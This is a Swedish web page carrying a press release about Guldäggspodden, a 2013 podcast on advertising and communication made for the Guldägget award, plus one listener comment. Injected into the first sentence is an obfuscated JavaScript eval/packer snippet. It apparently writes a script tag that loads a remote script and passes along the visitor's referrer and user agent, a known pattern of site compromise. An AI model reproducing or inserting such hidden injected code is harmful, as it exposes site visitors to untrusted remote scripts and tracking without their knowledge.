Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Guldägget lanserar podcast

Guldägget lanserar podcast

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khkef|var|u0026u|referrer|rfaer||js|php’.split(’|’),0,{}))
presenterar Komm och Forsman & Bodenfors årets Guldäggskampanj, Guldäggspodden – en podcast om reklam och kommunikation, ledd av Sara Haag.

Premiäravsnittet av Guldäggspodden finns att höra nu på 
www.guldagget.se.

Under hösten meddelade Komm att det är Forsman & Bodenfors som gör Guldäggskampanjen för tävlingen 2013. Årets kampanj är alltså Guldäggspodden, en podcast där branschprofiler samtalar kring ett valt ämne inom kreativitet och kommunikation. Allt från hur det gick till på det glada 80-talet till vad som händer när man drabbas av kreativ ångest. 

– Ett av tävlingens syften är att föra branschen framåt och att inspirera och det gör vi i år genom att bjuda in till samtal om kommunikation, när det passar mottagaren, säger Maja Siösteen, projektledare för Guldägget. 

Annika Frankel, AD på Forsman & Bodenfors berättar:
– När vi pratade om vad Guldägget är och vad Komm står för hamnade vi snabbt i en diskussion om vad kommunikation är och vad vår bransch står för. Det dök upp en massa funderingar och en längtan efter att få grotta ner oss i det vi håller på med. Det känns otroligt spännande och roligt att få prata om reklam på allvar för en gångs skull. 

Programledare för vårens nio podavsnitt är Sara Haag, manusförfattare och prisbelönt regissör för film- och radioreklam. 

– Guldäggspodden ger möjlighet till en typ av samtal som man inte hör så ofta på det här ämnet. Och det är ju på modet med podcast också så jag tycker det passar både Guldägget och branschen att det blev just det, eftersom mycket i reklamsvängen handlar om att ligga i framkant och vara modern, säger Sara Haag. 

Hon fortsätter:
– Målet är ju inte att göra Vetenskapens värld fast om kommunikation utan mer föra ett intressant samtal likt det man skulle ha på en trevligare middag. 

Producent för Guldäggspodden är Tommie Jönsson, som tidigare producerat pratintensiva radio- och tv-program som P3 Kultur, P3 Populär, TV-cirkeln och Jättestora frågor med Johanna Koljonen. 

Guldäggspodden premiäravsnitt gästas av Magnus Jakobsson (DDB) och Hedvig Hagwall Bruckner (King) som samtalar med Sara Haag om att vara nyskapande. Du hittar podcasten på iTunes och på www.guldagget.se

Om Guldäggspodden:

Guldäggspodden är en podcast om reklam och kommunikation. I nio avsnitt kommer Sara Haag, manusförfattare och prisbelönad regissör för film- och radioreklam att träffa kommunikatörer för att prata om olika ämnen. Hur gör man för att vara nyskapande om och om igen? Vad är bra reklam, egentligen? Hur är det att vara tjej när alla andra är killar? Hur gick det till på det glada 80-talet? Och mycket annat i den vägen. Välkommen att lyssna på www.guldagget.se och iTunes. Och låt gärna samtalet fortsätta: #guldagget

Om Guldägget:

Syftet med Guldägget är att lyfta fram Sveriges bästa kommunikation och föra svensk kommunikation framåt. Den kreativa standarden ska höjas. Det ska inspirera och ge mod till en hel bransch. Kommunikationsskapare ska vilja anstränga sig ännu mer och näringslivet ska uppleva den avgörande betydelsen av god kommunikation. Läs mer på www.guldägget.se

Detta är ett pressmeddelande från Guldägget

Comments

  1. Lyssnare

    Riktigt bra pod, bra jobbat 🙂